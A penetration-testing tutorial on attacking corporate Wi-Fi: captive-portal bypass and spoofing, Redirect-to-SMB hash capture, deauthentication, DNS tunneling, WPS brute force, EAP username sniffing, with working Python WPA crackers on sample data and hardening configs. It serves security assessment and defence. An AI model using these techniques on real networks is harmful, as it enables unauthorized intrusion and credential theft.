Improperly configured wireless networks are often an easy way into a target network. Testing them is frequently overlooked even though they are common in corporate environments and usually offer direct access to internal network segments. Granted, some wireless configurations are currently close to “impenetrable,” yet a single missing setting (certificate validation on the server side and on the client side) can be the undoing of an enterprise wireless network. The Aircrack-ng suite and Kismet are the de facto standards for assessing wireless networks; both will tell you which networks are in range, their encryption and authentication types, their connected clients, and more.

What this blog will cover:

  • A brief outline of several wireless configuration scenarios and a high-level overview of testing these networks from a security standpoint.

What this blog won’t cover:

  • Much older and highly insecure protocols such as WEP – just don’t use it.
  • Particularly disruptive techniques (e.g. Karma).
  • Key reinstallation attacks (KRACK) are not covered in depth in this post as they might not be the most feasible attack in a short wireless engagement, although determining whether access points (APs) are vulnerable to the KRACK attack would be valuable information.

Note that this post is for educational purposes only and should not be used, under any circumstances, on networks that you do not own.

Open Networks

Most companies have an open network with some sort of captive portal for guest access. These setups usually run a “walled garden” that allows no Internet access until you authenticate through the portal. Spoofing the captive portal of a guest-only network is usually not worth the time on a short engagement, since at best it yields guest credentials.

Since you still connect to the network and receive an IP address on most open guest networks with captive portals, here are some things to try:

MAC Spoofing – Some wireless networks employ MAC address filtering that only allows whitelisted devices to connect, and most captive portals track who has already authenticated by MAC (and sometimes IP) address. After surveying the network with Airodump-ng to find connected clients, use macchanger or ifconfig to change your MAC address to that of a connected client, then reconnect and check whether you have further access to the network or have bypassed the portal. Some access points will notice a connection attempt from a device with the same MAC address as an already connected device and will take measures to prevent it; in that case, deauthenticate the connected client with Aireplay-ng before attempting your connection.

Brute-force Attacks – If time allows, you might attempt to brute-force the captive portal authentication using Hydra, Medusa, or something similar. Gaining access to the captive portal may or may not be fruitful or worth the time on a short engagement. Make sure to also test for default and easily guessable credentials, such as “admin” as the username and password.

Client Isolation – Check for a lack of client isolation while not yet authenticated to the guest network captive portal. I have seen configurations where other devices on the network were reachable before captive portal authentication, including vulnerable corporate devices that had been accidentally connected to the guest network; exploiting those yielded corporate network credentials. However, confirm that you can actually talk to the device: some captive portals redirect (DNAT) all 80/TCP traffic to the portal itself, which creates the illusion that port 80 is open on every host you scan.

  • Nmap “Ping Scan” – This scan performs several host-discovery probes on a local network, including ICMP echo requests and ARP requests (on the local subnet Nmap uses ARP, which the portal cannot intercept):
    • nmap -sn 192.168.0.0/24
  • Masscan – A very fast scan that can aid in scanning large subnets. I will normally scan all private IP address ranges on specific ports like SMB over 445/TCP and HTTP/HTTPS over 80/TCP and 443/TCP, provided the captive portal is not redirecting traffic on those ports. Be careful with the “--rate” flag: 100,000 packets per second will saturate a wireless link, so start much lower.
    • masscan 192.168.0.0/16 -p80,443,445 --rate 100000
    • masscan 10.0.0.0/8 -p80,443,445 --rate 100000
    • masscan 172.16.0.0/12 -p80,443,445 --rate 100000
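As an added example (not code from the original post), here is the “illusion of open port 80” check described above, in Python. It parses the HTTP reply from each probed host and flags hosts whose reply is a redirect to the portal, or whose reply is byte-identical to that of several other hosts, which real hosts never produce. The portal hostnames, IP addresses and HTTP responses are constructed for the example; `probe()` does real sockets and is only meaningful on a live guest network.

```python
"""
Added example (not from the original post): distinguish a genuinely open port 80 from a
captive portal that DNATs every 80/TCP connection to itself.  Two heuristics:
  1. the reply is a redirect whose Location points at the portal host; or
  2. several unrelated hosts return byte-identical HTTP replies, which real hosts do not.
All hostnames, addresses and responses below are constructed placeholders.
"""
import hashlib
import socket
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

PORTAL_HOSTS = {"portal.guest.example", "10.255.255.1"}   # assumed portal names/addresses


def parse_http_response(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Return (status_code, lowercase header dict), or (0, {}) if the bytes are not HTTP."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        return 0, {}
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def classify(raw: bytes, portal_hosts=PORTAL_HOSTS) -> str:
    """'no-http', 'portal-redirect' or 'real-http' for one host's raw reply."""
    status, headers = parse_http_response(raw)
    if status == 0:
        return "no-http"
    if status in (301, 302, 303, 307, 308) and "location" in headers:
        if (urlsplit(headers["location"]).hostname or "") in portal_hosts:
            return "portal-redirect"
    return "real-http"


def find_intercepted(responses: Dict[str, bytes], portal_hosts=PORTAL_HOSTS,
                     min_identical: int = 3) -> Dict[str, str]:
    """Classify every probed host, then downgrade 'real-http' verdicts to
    'portal-intercept' when the same bytes came back from min_identical or more hosts."""
    verdict = {host: classify(raw, portal_hosts) for host, raw in responses.items()}
    buckets: Dict[str, List[str]] = {}
    for host, raw in responses.items():
        if verdict[host] == "real-http":
            buckets.setdefault(hashlib.sha256(raw).hexdigest(), []).append(host)
    for hosts in buckets.values():
        if len(hosts) >= min_identical:
            for host in hosts:
                verdict[host] = "portal-intercept"
    return verdict


def probe(host: str, port: int = 80, timeout: float = 3.0, limit: int = 4096) -> bytes:
    """Send a minimal HTTP/1.1 request and return the raw reply (b'' if nothing answers).
    Network code: only meaningful when run on the guest network itself."""
    request = f"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            reply = b""
            while len(reply) < limit:
                chunk = sock.recv(limit - len(reply))
                if not chunk:
                    break
                reply += chunk
            return reply
    except OSError:
        return b""


# constructed replies: what a portal-intercepted /24 typically looks like
PORTAL_302 = (b"HTTP/1.1 302 Found\r\n"
              b"Location: http://portal.guest.example/login\r\nContent-Length: 0\r\n\r\n")
PORTAL_200 = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 43\r\n\r\n"
              b"<html><body>Guest Wi-Fi login</body></html>")
PRINTER_200 = b"HTTP/1.1 200 OK\r\nServer: HP HTTP Server\r\nContent-Length: 5\r\n\r\nhello"

SAMPLE_RESPONSES = {
    "10.10.1.20": PORTAL_302,     # portal answered with a redirect to itself
    "10.10.1.21": PORTAL_200,     # portal served its login page directly ...
    "10.10.1.22": PORTAL_200,     # ... identically, from three different addresses
    "10.10.1.23": PORTAL_200,
    "10.10.1.24": PRINTER_200,    # a real device that happens to be reachable
    "10.10.1.25": b"",            # nothing answered
}

if __name__ == "__main__":
    for host, verdict in sorted(find_intercepted(SAMPLE_RESPONSES).items()):
        print(f"{host:<12} {verdict}")
```

On a real engagement, feed `find_intercepted` the output of `probe()` over the hosts Masscan reported as open; anything that comes back `portal-redirect` or `portal-intercept` is the portal, not the host, and only `real-http` hosts are worth further attention.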

Captive Portal Spoofing – Make a clone of the captive portal while connected to the network. Serve the cloned web page from your attacking machine and spin up a rogue access point that mimics the target network. When a victim connects, their attempted web traffic is redirected to your cloned captive portal and, ideally, they enter valid credentials for the guest portal. This can be used against any network with a captive portal, not just guest networks.

  • Captive portal attack: There are many ways to perform captive portal attacks, but I prefer to use Eaphammer (https://github.com/s0lst1c3/eaphammer#v—performing-captive-portal-attacks) as it includes several other wireless attacks built in.
    • Clone captive portal – You can clone the captive portal using several methods, including saving the page in your web browser or by using wget.
    • Perform captive portal attack – Ensure your cloned web page exists in the /var/www/html/ directory, where Eaphammer serves it according to the default Apache2 configuration. Run Eaphammer with the “--captive-portal” flag together with the “--interface”, “--essid”, “--channel” and “--bssid” of the network you are mimicking to create the rogue access point; “--bssid” is the MAC address of the AP you are spoofing. With any luck, clients will connect and enter their legitimate credentials into your spoofed captive portal. Make sure to have a packet capture running during this attack to capture authentication attempts against the portal.
  • Hostile portal attack: This attack also uses Eaphammer (https://github.com/s0lst1c3/eaphammer#v—performing-captive-portal-attacks) and is similar to the captive portal attack, but instead of redirecting the user to a captive portal it redirects the user’s HTTP traffic to an SMB share on the attacking machine, also known as a “Redirect to SMB” attack. The victim’s Windows machine automatically attempts NTLM authentication to that share, which yields NetNTLMv1/v2 challenge-responses for the user’s domain account; these can be cracked offline (Hashcat modes 5500 and 5600).

DNS Tunneling – Most guest networks let the client’s DNS queries reach a resolver that recurses on their behalf, because the portal redirect itself depends on name resolution working, and they rarely monitor that traffic. The captive portal can then be bypassed to obtain Internet access by tunneling traffic over DNS to an authoritative server you control. (If the portal instead answers every query with its own address until you log in, tunneling will not work.) While this may not be critical on a guest network, it still bypasses the portal mechanisms in place and is a common method of data exfiltration and malware command-and-control traffic.

  • Iodine and dnscat2 are two DNS tunneling tools. Setting DNS tunneling up for the first time can be a bit cumbersome, but I prefer Iodine, and the process can be found on Iodine’s Github page (https://github.com/yarrick/iodine). A quick feasibility check before setting anything up: from the portal-gated client, resolve a name under a domain whose authoritative server you control and watch whether the query arrives there.

WPA/WPA2 Pre-Shared Key (PSK)

Attacking networks that use a PSK is straightforward. The goal is to capture enough key material (a 4-way handshake or a PMKID) to test passphrase candidates offline. Most networks use this configuration, and while the capture itself can rarely be prevented, it does not guarantee access: each candidate costs 4,096 iterations of PBKDF2-HMAC-SHA1, so with current hardware a long random passphrase (25 characters or more) cannot be brute-forced in a reasonable timeframe (years).

  • Capturing WPA Handshake: This is the classic way to attack networks using PSK authentication. It relies on capturing the 4-way handshake that takes place when a client authenticates and associates to the access point. Put your wireless card in monitor mode with Airmon-ng, then capture with Airodump-ng, specifying the channel and BSSID (for example “airodump-ng -c 6 --bssid <AP MAC> -w capture wlan0mon”); otherwise it will channel hop and may miss all or part of the handshake. Airodump-ng prints “WPA handshake: <BSSID>” at the top right of its window once it has one. You can speed this up by deauthenticating a connected client with Aireplay-ng (“aireplay-ng --deauth 5 -a <AP MAC> -c <client MAC> wlan0mon”) so that it reconnects. The handshake does not contain the PSK or a hash of it; it contains the nonces and a MIC computed from keys derived from the PSK, which is enough to test candidates offline with Aircrack-ng or Hashcat. Hashcat is my preferred method as it uses GPUs for faster cracking. Use hash type 2500 when cracking WPA PSKs with Hashcat (Hashcat 6.0 and later replaced 2500 and 16800 with mode 22000, fed from hcxpcapngtool output, which covers both handshakes and PMKIDs). As this attack requires frames from both the AP and the client, physical proximity to both increases the likelihood of capturing the full 4-way handshake.
  • WiFi Protected Setup (WPS): WPS is a feature on most consumer wireless routers and some access points that promotes “convenience” by allowing users to join with an 8-digit PIN or the push of a button. The PIN is weak by design: its last digit is a checksum and the protocol acknowledges the first and second halves separately, so an online brute force needs at most about 11,000 attempts (10^4 + 10^3) rather than 10^8. Reaver automates this and succeeds against most APs that do not rate-limit or lock WPS after failed attempts; the Pixie Dust variant (“reaver -K”, or pixiewps on its own) recovers the PIN offline from a single exchange when the AP uses weak random nonces. Disable WPS on every wireless router and access point.
  • PMKID Attack: Announced by the Hashcat team in 2018, this attack makes PSK networks even easier to attack, since it does not require capturing the 4-way handshake and therefore does not need a connected client, which can be a burden when testing some wireless networks. The PMKID is sent by the access point in the first EAPOL message of the handshake (in the RSN PMKID KDE) on APs with roaming or PMK caching enabled, so it can be obtained by simply starting an association; capture it with hcxdumptool and crack it with Hashcat mode 16800 (mode 22000 in Hashcat 6.0 and later). Not every AP sends a PMKID. While this vector is easier to obtain, it does not speed up cracking: the PMKID is an HMAC over the same PBKDF2-derived PMK, so every candidate costs exactly the same.
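The following added example (not from the original post) shows what Aircrack-ng or Hashcat actually compute for the two attack variants above: the PBKDF2 passphrase-to-PMK mapping, the PMKID check, and the 4-way-handshake MIC check. It builds its own “captured” handshake message 2 from a known passphrase so that it runs offline; the SSID, MAC addresses, nonces and wordlist are made up, and the only real-world value is the IEEE 802.11 test vector (passphrase “password”, SSID “IEEE”) used as a sanity check of the PBKDF2 step.

```python
"""
Added example (not from the original post): what an offline WPA2-PSK attack computes,
for both the 4-way-handshake and the PMKID variants.  The "captured" material is
constructed here from a known passphrase so the cracker can be run offline; the SSID,
MAC addresses, nonces and wordlist are all made up.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11 PSK mapping: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output.
    # This is the expensive step and it is identical for both attack variants, which is
    # why a PMKID does not crack any faster than a handshake.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = Truncate-128(HMAC-SHA1(PMK, "PMK Name" || AA || SPA)), carried by the AP
    # in the RSN PMKID KDE of handshake message 1.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11 PRF-512 (HMAC-SHA1 based), used for WPA2/CCMP pairwise key expansion
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame_with_mic_zeroed: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/AES): MIC = Truncate-128(HMAC-SHA1(KCK, EAPOL frame))
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


# EAPOL-Key frame layout as sent in handshake message 2; the MIC field sits at bytes 81..96
MIC_OFFSET = 81


def build_eapol_key_frame(snonce: bytes, mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    body = (b"\x02"                            # descriptor type 2 = RSN key descriptor
            + (0x010A).to_bytes(2, "big")      # key info: version 2, pairwise, MIC present
            + (16).to_bytes(2, "big")          # key length (CCMP)
            + (1).to_bytes(8, "big")           # replay counter
            + snonce                           # key nonce: SNonce in message 2
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, reserved key ID
            + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type 3 = EAPOL-Key


def mic_field(frame: bytes) -> bytes:
    return frame[MIC_OFFSET:MIC_OFFSET + 16]


def zero_mic(frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]


def crack_pmkid(candidates: Iterable[str], ssid: str, ap_mac: bytes, sta_mac: bytes,
                captured_pmkid: bytes) -> Optional[str]:
    for candidate in candidates:
        if pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac) == captured_pmkid:
            return candidate
    return None


def crack_handshake(candidates: Iterable[str], ssid: str, ap_mac: bytes, sta_mac: bytes,
                    anonce: bytes, snonce: bytes, msg2: bytes) -> Optional[str]:
    target, zeroed = mic_field(msg2), zero_mic(msg2)
    for candidate in candidates:
        ptk = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if eapol_mic(ptk[:16], zeroed) == target:   # KCK = first 128 bits of the PTK
            return candidate
    return None


# constructed "capture": a made-up network whose PSK we pretend not to know
SSID = "CorpGuest"
PASSPHRASE = "Summer2019!"
AP_MAC = bytes.fromhex("00c0ca3fbb10")
STA_MAC = bytes.fromhex("3c5ab4a1d2e3")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "Welcome1", "CorpGuest2019", "Summer2019!", "letmein"]


def make_capture():
    """Return (PMKID, handshake message 2) exactly as a sniffer would see them."""
    pmk = pmk_from_passphrase(PASSPHRASE, SSID)
    ptk = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    msg2 = build_eapol_key_frame(SNONCE)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(ptk[:16], msg2) + msg2[MIC_OFFSET + 16:]
    return pmkid(pmk, AP_MAC, STA_MAC), msg2


if __name__ == "__main__":
    # sanity check against the IEEE 802.11 test vector for the PSK mapping
    assert pmk_from_passphrase("password", "IEEE").hex() == \
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    captured_pmkid, captured_msg2 = make_capture()
    print("PMKID     ->", crack_pmkid(WORDLIST, SSID, AP_MAC, STA_MAC, captured_pmkid))
    print("handshake ->", crack_handshake(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured_msg2))
```

Both crackers spend essentially all their time in `pmk_from_passphrase`; the PMKID route only changes how the verifiable material is obtained (one frame from the AP, no client needed), not how many candidates per second can be tried. hcxpcapngtool and Aircrack-ng perform the same extraction (ANonce, SNonce, MAC addresses, the MIC and the MIC-zeroed EAPOL frame) from a real capture file.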

WPA/WPA2 Enterprise

Enterprise wireless networks (802.1X) currently provide the best security for a wireless network IF configured correctly. They use a backend authentication server (normally RADIUS) and validate connecting clients with a username and password or with certificates. Enterprise networks can be configured with several Extensible Authentication Protocol (EAP) methods, such as Protected EAP (PEAP), EAP-TLS and EAP-TTLS, plus much older ones such as LEAP. PEAP and EAP-TTLS carry an inner authentication (normally MS-CHAPv2) inside a TLS tunnel to the RADIUS server; EAP-TLS authenticates both sides with certificates and has no password exchange at all. However, misconfiguration of these networks can make them arguably worse than a PSK network, because what gets captured is a domain credential.

  • Attacking PEAP: Before the TLS tunnel is established, the supplicant answers the EAP Identity Request in cleartext. Unless the client has been configured with an anonymous outer identity, that response carries the real username (Windows sends it by default), and these EAP Identity Response frames can be sniffed with tcpdump, Airodump-ng, Wireshark (display filter “eap.code == 2 && eap.type == 1”), or specialized tools such as crEAP.py (https://github.com/Shellntel/scripts/blob/master/crEAP.py). Your wireless card should be in monitor mode when using those tools unless the tool does it for you (crEAP.py). Usernames gathered this way can be used in brute-force or password-spraying attacks against the network. PEAP can also be attacked by deploying a rogue access point (using Eaphammer, Mana, etc.) that mimics the target network’s ESSID and presents its own RADIUS server; clients that do not validate the server certificate connect to it and complete the inner MS-CHAPv2 exchange with you, revealing a challenge/response for the user’s password. MS-CHAPv2 is cryptographically weak: the challenge/response can be cracked against a wordlist (Hashcat mode 5500), and since 2012 it has been known to reduce to a single 2^56 DES key search, which recovers the NT hash regardless of password strength.
  • Attacking EAP-TTLS: EAP-TTLS uses the same cleartext outer EAP Identity exchange as PEAP, so whether the username is exposed depends on the supplicant using an anonymous outer identity, not on the protocol. EAP-TTLS was designed around an anonymous outer identity (typically anonymous@realm), so sniffing these networks usually yields only the realm rather than usernames. Inside the tunnel EAP-TTLS supports PAP as well as MS-CHAPv2, so a client that does not validate the server certificate may hand a rogue access point the cleartext password rather than a challenge/response. As mentioned previously, EAP-TTLS networks that do not use server and client certificate validation are susceptible to rogue access point attacks just like PEAP.
  • EAP-TLS: Using EAP-TLS on an 802.1X enterprise network is currently (before mass adoption of WPA3) the most secure way to deploy a wireless network. The entire exchange between supplicant, authenticator and authentication server is mutually authenticated with certificates: the client proves possession of a private key that never leaves the device, so there is no password to capture. A rogue access point obtains at most the client’s public certificate and identity, never a reusable credential, and a client that validates the server certificate will not get even that far. So far, attacking these networks is largely unfruitful; the weak points, if any, are certificate issuance and private-key storage on endpoints, not the wireless exchange itself.
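As an added example (not code from the original post, and not crEAP.py itself), here is the cleartext part of a PEAP/EAP-TTLS exchange that such sniffing harvests before any TLS tunnel exists, in Python: it parses 802.1X EAP packets, collects the outer identities and the EAP methods the server proposes, and flags whether an identity actually leaks a username. The frames are constructed EAPOL payloads (what follows the 802.11 and LLC headers in a monitor-mode capture); the realm and usernames are made up.

```python
"""
Added example (not from the original post): the cleartext part of a PEAP/EAP-TTLS
exchange that crEAP.py-style sniffing harvests before any TLS tunnel exists.  The
frames below are constructed EAPOL payloads (what follows the 802.11/LLC headers in a
monitor-mode capture); the realm and usernames are made up.
"""
from typing import Dict, List, Optional

EAPOL_EAP_PACKET = 0          # EAPOL type 0 carries an EAP packet; type 3 is EAPOL-Key
EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_IDENTITY = 1
EAP_METHOD_NAMES = {13: "EAP-TLS", 17: "LEAP", 21: "EAP-TTLS", 25: "PEAP", 26: "EAP-MSCHAPv2"}


def build_eap(code: int, ident: int, eap_type: int, payload: bytes = b"") -> bytes:
    """Wrap one EAP packet in an 802.1X (EAPOL v2) header; used to build the sample."""
    eap = bytes([code, ident]) + (5 + len(payload)).to_bytes(2, "big") + bytes([eap_type]) + payload
    return b"\x02\x00" + len(eap).to_bytes(2, "big") + eap


def parse_eapol(frame: bytes) -> Optional[Dict[str, object]]:
    """Return the EAP code/id/type/payload of an EAPOL EAP-Packet, None for anything else."""
    if len(frame) < 8 or frame[1] != EAPOL_EAP_PACKET:
        return None
    eap_len = int.from_bytes(frame[2:4], "big")
    eap = frame[4:4 + eap_len]
    if len(eap) < 4 or int.from_bytes(eap[2:4], "big") != len(eap):
        return None
    eap_type = eap[4] if len(eap) > 4 else None      # Success/Failure packets carry no type
    return {"code": eap[0], "id": eap[1], "type": eap_type, "payload": eap[5:]}


def harvest(frames: List[bytes]) -> Dict[str, object]:
    """Collect every cleartext outer identity and every EAP method the network proposed."""
    identities: List[str] = []
    methods = set()
    for frame in frames:
        pkt = parse_eapol(frame)
        if pkt is None:
            continue
        if pkt["code"] == EAP_RESPONSE and pkt["type"] == EAP_TYPE_IDENTITY:
            identities.append(pkt["payload"].decode("utf-8", "replace"))
        elif pkt["code"] == EAP_REQUEST and pkt["type"] in EAP_METHOD_NAMES:
            methods.add(EAP_METHOD_NAMES[pkt["type"]])
    return {"identities": identities, "methods": sorted(methods)}


def is_anonymous(identity: str) -> bool:
    """True when the outer identity hides the user: '', 'anonymous', '@realm', 'anonymous@realm'."""
    user = identity.split("@", 1)[0].strip().lower()
    return user in ("", "anonymous")


# constructed exchange: identity request, a Windows-style response carrying the real
# username, the server proposing PEAP (flags byte 0x20 = Start), a hardened client's
# anonymous outer identity, and finally an EAPOL-Key frame the parser must ignore
SAMPLE_FRAMES = [
    build_eap(EAP_REQUEST, 1, EAP_TYPE_IDENTITY),
    build_eap(EAP_RESPONSE, 1, EAP_TYPE_IDENTITY, b"CORP\\jsmith"),
    build_eap(EAP_REQUEST, 2, 25, b"\x20"),
    build_eap(EAP_RESPONSE, 7, EAP_TYPE_IDENTITY, b"anonymous@corp.example"),
    b"\x02\x03\x00\x05\x02\x00\x8a\x00\x10",
]

if __name__ == "__main__":
    result = harvest(SAMPLE_FRAMES)
    for ident in result["identities"]:
        print(f"{ident!r:<30} {'anonymous' if is_anonymous(ident) else 'REAL USERNAME LEAKED'}")
    print("methods offered:", ", ".join(result["methods"]))
```

The same two conditions (EAP code 2, type 1) are what the Wireshark filter “eap.code == 2 && eap.type == 1” selects; the methods the server proposes (PEAP, EAP-TTLS, EAP-TLS) tell you which rogue-AP attack from the list above is even applicable before you bring an access point up.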

There are many possible wireless configurations, most of them not shown here, and many have vulnerabilities. A single misconfiguration can be disastrous for a wireless network, especially an 802.1X enterprise network: a user’s captured MS-CHAPv2 challenge/response, once cracked, yields a domain credential and therefore access to the target network and domain, not just a passphrase as on a PSK network. While 802.1X is currently the most secure configuration, disabling insecure EAP types on the RADIUS server is critical, and client supplicants must be configured to validate the server certificate (trusted CA plus the expected server name) and, where possible, to use an anonymous outer identity. Only EAP-TLS should be used on secure wireless networks if possible.
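The “single missing setting” from the introduction, made concrete as an added example (not from the original post) in wpa_supplicant.conf syntax: the first block is the weak client configuration that a rogue access point exploits, the second is the same PEAP network with server-certificate validation and an anonymous outer identity, and the third is EAP-TLS. The SSID, realm, server name and file paths are placeholders; the Windows equivalents are “Verify the server’s identity by validating the certificate”, “Connect to these servers” and “Enable identity privacy” in the PEAP properties.

```conf
# WEAK: trusts any RADIUS certificate and sends the real username in the clear.
# A rogue AP with the same SSID and any self-signed certificate captures jsmith's
# MS-CHAPv2 challenge/response.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith"
    password="placeholder"
    phase2="auth=MSCHAPV2"
    # no ca_cert, no domain_match: certificate validation is effectively off
}

# HARDENED PEAP: pin the issuing CA and the RADIUS server name, hide the username
# outside the tunnel.  The rogue AP's certificate fails validation and the inner
# exchange never starts; sniffers see only anonymous@corp.example.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@corp.example"
    identity="jsmith"
    password="placeholder"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
}

# BETTER: EAP-TLS.  No password exists to capture or crack; the private key never
# leaves the device and the server is still pinned by CA and name.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="jsmith@corp.example"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    client_cert="/etc/wpa_supplicant/jsmith.crt"
    private_key="/etc/wpa_supplicant/jsmith.key"
    domain_match="radius.corp.example"
}
```

Whichever EAP type is in use, the check to run on a client build is simply whether `ca_cert` and `domain_match` (or their equivalents on other platforms) are set; with either missing, the client will complete authentication against any access point that advertises the right SSID.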